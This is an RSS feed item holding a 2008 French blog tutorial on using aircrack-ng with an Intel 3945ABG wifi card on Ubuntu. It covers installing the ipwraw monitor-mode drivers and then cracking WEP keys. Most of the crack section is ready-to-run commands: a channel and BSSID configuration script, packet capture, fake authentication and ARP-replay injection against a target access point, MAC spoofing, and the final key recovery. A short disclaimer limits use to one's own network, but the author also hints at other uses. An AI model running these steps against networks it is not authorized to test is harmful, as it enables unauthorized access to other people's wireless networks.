<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Le Blog de SckyzO &#187; aircrack</title>
	<atom:link href="http://blog.sckyzo.com/tag/aircrack/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.sckyzo.com</link>
	<description></description>
	<lastBuildDate>Fri, 30 Jul 2010 16:09:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Aircrack-NG avec une carte Wireless Intel 3945 ABG</title>
		<link>http://blog.sckyzo.com/2008/05/15/aircrack-ng-avec-une-carte-wireless-intel-3945-abg/</link>
		<comments>http://blog.sckyzo.com/2008/05/15/aircrack-ng-avec-une-carte-wireless-intel-3945-abg/#comments</comments>
		<pubDate>Thu, 15 May 2008 17:26:38 +0000</pubDate>
		<dc:creator>SckyzO</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Logiciel Libre]]></category>
		<category><![CDATA[Planet-Libre]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[3945ABG]]></category>
		<category><![CDATA[aircrack]]></category>
		<category><![CDATA[Intel Wireless 3945 ABG]]></category>
		<category><![CDATA[ipw3945]]></category>
		<category><![CDATA[iwl3945]]></category>
		<category><![CDATA[macchanger]]></category>

		<guid isPermaLink="false">http://blog.sckyzo.com/2008/05/15/aircrack-ng-avec-une-carte-wireless-intel-3945-abg/</guid>
		<description><![CDATA[Ce petit &#8216;tuto&#8217; est plus un pense bête qu&#8217;un article, mais il est possible qu&#8217;il aide quelques personnes dans leur démarche de sécurisation de réseau Wifi (ou pas ?!) Depuis quelques semaines j&#8217;ai un nouveau portable pour le taf, un Dell latitude D520, intégrant un chipset Intel, et ayant une carte wifi $ lspci c:00.0]]></description>
			<content:encoded><![CDATA[<p>Ce petit &#8216;tuto&#8217; est plus un pense bête qu&#8217;un article, mais il est possible qu&#8217;il aide quelques personnes dans leur démarche de sécurisation de réseau Wifi (ou pas ?!)</p>
<p>Depuis quelques semaines j&#8217;ai un nouveau portable pour le taf, un Dell latitude D520, intégrant un chipset Intel, et ayant une carte wifi</p>
<pre>
<li>$ lspci</li>
<li>c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)</li>
</pre>
<p>Il se trouve que sur d&#8217;autres distributions, les drivers intégrés au kernel étaient compatibles, mais sur la petite distribution Ubuntu 8.04, les drivers ne sont plus compatible pour accepter le &laquo;&nbsp;mode monitor&nbsp;&raquo;.</p>
<p>Avant de commencer tout cela, un petit rappel des faits.</p>
<h2>AirCrack-NG</h2>
<p><strong>Aircrack-ng</strong> est un groupe d&#8217;outils de <em>monitoring</em> pour réseau sans fil dont l&#8217;utilisation principale est le « cassage » de clés 
<a  href="http://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy" title="Wired Equivalent Privacy" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Wired_Equivalent_Privacy');" >WEP</a> et 
<a  href="http://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access#La_s.C3.A9curit.C3.A9_dans_le_mode_pre-shared_key" title="Wi-Fi Protected Access" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Wi-Fi_Protected_Access?La_s.C3.A9curit.C3.A9_dans_le_mode_pre-shared_key');" >WPA-PSK</a>.</p>
<p><strong>Aircrack</strong> fut développé sous licence 
<a  href="http://fr.wikipedia.org/wiki/Licence_publique_g%C3%A9n%C3%A9rale_GNU" title="Licence publique générale GNU" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Licence_publique_g%C3%A9n%C3%A9rale_GNU');" >GPL</a> par Christophe Devine (consultant en sécurité informatique) puis repris par Thomas d&#8217;Otreppe sous le nom de <strong>Aircrack-ng</strong>.</p>
<p>La version 0.9, comprend entre autres les outils suivants:</p>
<ul>
<li>aircrack-ng: casseur de clés WEP statiques et WPA-PSK (Nouveau type de casseur: PTW)</li>
<li>airdecap-ng: décrypteur de fichiers WEP/WPA capturés</li>
<li>aireplay-ng: programme d&#8217;injection de paquets 802.11 (disponible sous Linux et FreeBSD seulement)</li>
<li>airodump-ng: programme de capture de paquets 802.11</li>
<li>airtun-ng: programme pour la création d&#8217;une interface virtuelle</li>
</ul>
<p><span class="new">no</span><span class="new">t</span><span class="new">e:</span> <em>Ce logiciel est conçu pour tester la sécurité de son propre réseau, l&#8217;attaque d&#8217;un réseau extérieur sans l&#8217;accord de son propriétaire est passible de peines d&#8217;emprisonnement.</em></p>
<h2>Pré-requis</h2>
<p id="result_box" dir="ltr">     * Vous possédez une machine linux avec Hardy Heron fraîchement installé, je n&#8217;ai ni le temps ni la volonté de tester sur un système amélioré<br />
* Vous avez réussi à compiler / installer les précédentes versions du pilote ipwraw (ceci je l&#8217;explique par la suite)<br />
* Vous savez comment utiliser Aircrack-ng (un minimum)<br />
* Vous possédez une clé WEP (Weak Encryption Protocol <img src='http://blog.sckyzo.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> )<br />
* Vous pouvez utiliser le CLI (ahhhhhhhh, linux, votre CLI, un outil puissant et un mal de tête assuré pour les néophytes &#8230; CLI = Command Line Interface &#8230; La ligne de commande)<br />
* Les LETTRES MAJUSCULES dans la procédure de crackage de la clé WEP sont des paramètres FICTIFS pour<br />
- CHANNEL, le canal qui sera reniflé / injecté<br />
- FILE, un nom de fichier<br />
- ESSID, le nom du point d&#8217;accès tels que FREEPHONIE, LIVEBOX, &#8230;<br />
- BSSID, le point d&#8217;accès adresse<br />
- MACADDRESS, votre adresse mac de la carte wifi<br />
* Vous l&#8217;utilisez sous votre propre risque<br />
* Vous savez ce que le diable va faire</p>
<h2>Installation</h2>
<p>Rien de plus simple sous Ubuntu :</p>
<pre>sudo apt-get install aircrack-ng macchanger</pre>
<h2>Configuration de la carte 3945 ABG (ipw3945 ou iwl3945)</h2>
<p>Il se trouve donc que les drivers fournis avec la distribution ne sont pas compatible pour que aircrack-ng fonctionne correctement, et puis scanner les réseaux Wifi. Il faut donc mettre en place des &laquo;&nbsp;drivers alternatifs&nbsp;&raquo;, que nous fournis gentillement le site de aircrack-ng <img src='http://blog.sckyzo.com/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
<h3>Pré-requis</h3>
<pre class="code">sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger</pre>
<h3>Installation</h3>
<ul>
<li> Télécharger ipwraw-ng depuis 
<a  href="http://homepages.tu-darmstadt.de/%7Ep_larbig/wlan/" class="urlextern" title="http://homepages.tu-darmstadt.de/~p_larbig/wlan/" rel="nofollow" onclick="javascript:pageTracker._trackPageview('/external/homepages.tu-darmstadt.de/%7Ep_larbig/wlan/');" >http://homepages.tu-darmstadt.de/~p_larbig/wlan/</a> ou 
<a  href="http://dl.aircrack-ng.org/drivers/" class="urlextern" title="http://dl.aircrack-ng.org/drivers/" rel="nofollow" onclick="javascript:pageTracker._trackPageview('/external/dl.aircrack-ng.org/drivers/');" >http://dl.aircrack-ng.org/drivers/</a> (la dernière version en date étant la version 2.3.4 mise en ligne le 11 février 2008)</li>
<li> Installer les modules et le ucode</li>
<li> Blacklister ipwraw (pour ne pas qu&#8217;il soit lancé au démarrage de la machine)</li>
</ul>
<pre>
<li>wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2</li>
<li>tar -xjf ipwraw-ng*</li>
<li>cd ipwraw-ng</li>
<li>make</li>
<li>sudo make install</li>
<li>sudo make install_ucode</li>
<li>echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw</li>
<li>sudo depmod -ae</li>
</pre>
<p>Maintenant, les drivers modifiés on été installés. Il faut donc décharger les drivers &laquo;&nbsp;officiels&nbsp;&raquo; pour charger ceux qui permettrons d&#8217;utiliser Aircrack-ng (les drivers <strong>iwpraw</strong>)</p>
<h2>Utiliser ipwraw</h2>
<ul>
<li>  Décharger le module ipw3945 (ou <em>iwl3945</em> sur ma machine)</li>
<li>  Lancer ipwraw-ng</li>
</ul>
<p>Le périphérique créé sera automatiquement en 
<a  href="http://fr.wikipedia.org/wiki/Mode_moniteur" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Mode_moniteur');" >mode Monitor</a>.</p>
<pre class="code">sudo modprobe -r ipw3945</pre>
<p>ou</p>
<pre class="code">sudo modprobe -r iwl3945</pre>
<pre class="code">sudo modprobe ipwraw</pre>
<p>Le nouveau périphérique créé aura comme nom wifi0</p>
<pre>sckyzo@sckyzo:~$ iwconfig</pre>
<pre>lo        no wireless extensions.</pre>
<pre>eth0      no wireless extensions.</pre>
<pre>wifi0     unassociated  ESSID:off/any</pre>
<pre>Mode:Monitor  Channel=1  Bit Rate=54 Mb/s</pre>
<pre></pre>
<p>Voila, vous pouvez maintenant utiliser aircrack-ng pour sécuriser votre Wifi (ou pas ?!)</p>
<p>Bien sur, après utilisation des drivers alternatifs avec aircrack, il vous faut recharger les modules ipw3945 ou iwl3945</p>
<pre class="code">sudo modprobe -r ipwraw</pre>
<pre class="code">sudo modprobe iwl3945</pre>
<p>ou</p>
<pre class="code">sudo modprobe ipw3945</pre>
<p>Maintenant, les drivers fonctionnent (enfin). Alors que faire maintenant ?  Passons à l&#8217;action :<br />
Ouvrer un terminal, et copier ceci :</p>
<pre>#!/bin/bash
<li>clear</li>
<li>echo "Please provide the wifi0 CHANNEL"</li>
<li>read canal</li>
<li>echo "Please provide the capture rate (best results with only 2)"</li>
<li>read rate</li>
<li>echo "Please provide the target BSSID"</li>
<li>read bssid</li>
<li>ifconfig wifi0 down</li>
<li>chmod u+wrx /sys/class/net/wifi0/device/rate</li>
<li>echo $rate &gt;/sys/class/net/wifi0/device/rate</li>
<li>echo $canal &gt;/sys/class/net/wifi0/device/channel</li>
<li>echo $bssid &gt;/sys/class/net/wifi0/device/bssid</li>
<li>ifconfig wifi0 up</li>
<li>echo "Configuration completed. Ready to do packet injection"</li>
</pre>
<p>Enregistrez le document tel que : wepcrackconf.sh et attribuez les droits adéquates pour qu&#8217;il puisse être exécuté.</p>
<pre>sudo chmod +x wepcrackconf.sh</pre>
<h2>Crackage</h2>
<p>Ouvrez 4 terminaux (oui c&#8217;est beaucoup, mais il les faut)</p>
<p><font size="3">Premier terminal</font></p>
<pre>sudo airodump-ng wifi0</pre>
<p><font size="3">Second terminal</font></p>
<pre>sudo su
./wepcrackconf.sh</pre>
<ul>
<li>CHANNEL, choisissez le Canal de votre choix</li>
<li>rate toujours 2</li>
<li>BSSID, donné par le terminal précédent</li>
</ul>
<pre>exit</pre>
<pre>sudo airodump-ng -c CHANNEL -w FILE wifi0</pre>
<p><font size="3">Troisième terminal</font></p>
<pre>sudo macchanger -s wifi0</pre>
<pre>sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MAC_ADRESSE wifi0</pre>
<p><font size="3">Quatrième terminal</font></p>
<pre>aireplay-ng -3 -b BSSID -h MAC_ADRESSE wifi0</pre>
<p><font size="3">De retour sur le premier terminal</font><br />
Après avoir récolté assez de IV, faites Ctrl+C pour stopper l&#8217;application</p>
<pre>aircrack-ng FILE.cap</pre>
<p>IMPORTANT :<br />
Recueillir au moins 500000 paquets, pour casser une WEP 64-bit Hex<br />
Vous pouvez changer l&#8217;adresse MAC il suffit de lire les infos ou macchanger page du manuel (man macchanger)</p>
<p>Si toutefois vous avez des questions, n&#8217;hésitez pas.<br />
Je complèterai l&#8217;article au fur et à mesure de ma pensé</p>
<p>Mise à jour : Aircrack-ng Configuration et mise en route<br />
- Utilisation de macchanger (apt-get)<br />
- Lancement de Aircrack et sa suite (airodump, airemachin &#8230;.)<br />
- Crackage clé WEP<br />
- Script<br />
Bien évidemment, je suis resté très simpliste sur les termes et les fonctions car je pars du principe que je m&#8217;adresse à des gens connaissant le domaine. Sinon, un lien (ci dessous) renvois sur un tuto assez complexe et instructif bien qu&#8217;un peu depassé (mais tant que ça fonctionne &#8230; hein ^^)</p>
<p>Liens utiles :<br />

<a  href="http://fr.wikipedia.org/wiki/Mode_moniteur" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Mode_moniteur');" >http://fr.wikipedia.org/wiki/Mode_moniteur</a><br />

<a  href="http://fr.wikipedia.org/wiki/Aircrack" onclick="javascript:pageTracker._trackPageview('/external/fr.wikipedia.org/wiki/Aircrack');" >http://fr.wikipedia.org/wiki/Aircrack</a><br />

<a  href="http://www.aircrack-ng.org" onclick="javascript:pageTracker._trackPageview('/external/www.aircrack-ng.org');" >http://www.aircrack-ng.org</a><br />

<a  href="http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php" onclick="javascript:pageTracker._trackPageview('/external/www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php');" >http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php</a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sckyzo.com/2008/05/15/aircrack-ng-avec-une-carte-wireless-intel-3945-abg/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
	</channel>
</rss>
